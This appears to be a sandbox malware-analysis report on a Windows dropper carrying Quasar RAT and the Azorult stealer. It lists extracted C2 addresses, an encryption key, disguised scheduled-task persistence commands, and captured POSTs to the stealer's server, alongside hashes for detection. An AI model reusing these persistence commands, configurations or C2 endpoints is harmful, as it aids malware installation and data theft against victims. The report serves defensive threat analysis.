Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    4s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/03/2025, 02:28 UTC

General

  • Target

    eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe

  • Size

    2.0MB

  • MD5

    7888711f3d11f449955d82d767ee9762

  • SHA1

    5fc94a3d3d7aff5884a1732ee796b3f5fdd3364b

  • SHA256

    eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b

  • SHA512

    40d3b9548fb12f0ff0d035c654349d0e849c9715d81f3ae82909214596461247f5832672c2fc0aff30e9e5d329194c554e433fb8642a68635be78c92b4e9733b

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYf:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 13 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
    "C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
          PID:2888
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 160
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:2848
      • C:\Users\Admin\AppData\Local\Temp\windef.exe
        "C:\Users\Admin\AppData\Local\Temp\windef.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2392
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3012
        • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2084
      • C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
        "C:\Users\Admin\AppData\Local\Temp\eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:992
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
        2⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2840

    Network

    • flag-us
      DNS
      ip-api.com
      winsock.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/
      windef.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 06 Mar 2025 02:28:22 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 288
      Access-Control-Allow-Origin: *
      X-Ttl: 59
      X-Rl: 40
    • flag-us
      GET
      http://ip-api.com/json/
      winsock.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 06 Mar 2025 02:28:23 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 288
      Access-Control-Allow-Origin: *
      X-Ttl: 58
      X-Rl: 36
    • flag-us
      DNS
      0x21.in
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address:
      8.8.8.8:53
      Request
      0x21.in
      IN A
      Response
      0x21.in
      IN A
      44.221.84.105
    • flag-us
      POST
      http://0x21.in:8000/_az/
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address:
      44.221.84.105:8000
      Request
      POST /_az/ HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Host: 0x21.in:8000
      Content-Length: 97
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 06 Mar 2025 02:28:24 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=303dbd9df2044d937dcdf6b86f7250c7|212.102.63.147|1741228104|1741228104|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    • flag-us
      DNS
      0x21.in
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address:
      8.8.8.8:53
      Request
      0x21.in
      IN A
      Response
      0x21.in
      IN A
      44.221.84.105
    • flag-us
      POST
      http://0x21.in/_az/
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      Remote address:
      44.221.84.105:8000
      Request
      POST /_az/ HTTP/1.0
      Host: 0x21.in
      Connection: close
      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Content-Length: 97
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 06 Mar 2025 02:28:25 GMT
      Content-Type: text/html
      Connection: close
      Set-Cookie: btst=b3f155569080a2adec974065625a8fe3|212.102.63.147|1741228105|1741228105|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    • 208.95.112.1:80
      http://ip-api.com/json/
      http
      windef.exe
      328 B
      557 B
      4
      2

      HTTP Request

      GET http://ip-api.com/json/

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/json/
      http
      winsock.exe
      374 B
      557 B
      5
      2

      HTTP Request

      GET http://ip-api.com/json/

      HTTP Response

      200
    • 44.221.84.105:8000
      http://0x21.in:8000/_az/
      http
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      480 B
      870 B
      5
      5

      HTTP Request

      POST http://0x21.in:8000/_az/

      HTTP Response

      200
    • 44.221.84.105:8000
      http://0x21.in/_az/
      http
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      469 B
      590 B
      5
      5

      HTTP Request

      POST http://0x21.in/_az/

      HTTP Response

      200
    • 5.8.88.191:443
      winsock.exe
      152 B
      3
    • 8.8.8.8:53
      ip-api.com
      dns
      winsock.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      0x21.in
      dns
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      53 B
      69 B
      1
      1

      DNS Request

      0x21.in

      DNS Response

      44.221.84.105

    • 8.8.8.8:53
      0x21.in
      dns
      eba45a34e3dfa65dd307af9f5c018bf48aeb4a08fac42ca2899f9334b34e870b.exe
      53 B
      69 B
      1
      1

      DNS Request

      0x21.in

      DNS Response

      44.221.84.105

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \Users\Admin\AppData\Local\Temp\vnc.exe

      Filesize

      405KB

      MD5

      b8ba87ee4c3fc085a2fed0d839aadce1

      SHA1

      b3a2e3256406330e8b1779199bb2b9865122d766

      SHA256

      4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

      SHA512

      7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

    • \Users\Admin\AppData\Local\Temp\windef.exe

      Filesize

      349KB

      MD5

      b4a202e03d4135484d0e730173abcc72

      SHA1

      01b30014545ea526c15a60931d676f9392ea0c70

      SHA256

      7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

      SHA512

      632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

    • memory/992-39-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/992-43-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/992-33-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/992-31-0x0000000000080000-0x00000000000A0000-memory.dmp

      Filesize

      128KB

    • memory/2252-30-0x0000000000840000-0x0000000000841000-memory.dmp

      Filesize

      4KB

    • memory/2392-46-0x0000000000950000-0x00000000009AE000-memory.dmp

      Filesize

      376KB

    • memory/2508-58-0x0000000000F00000-0x0000000000F5E000-memory.dmp

      Filesize

      376KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.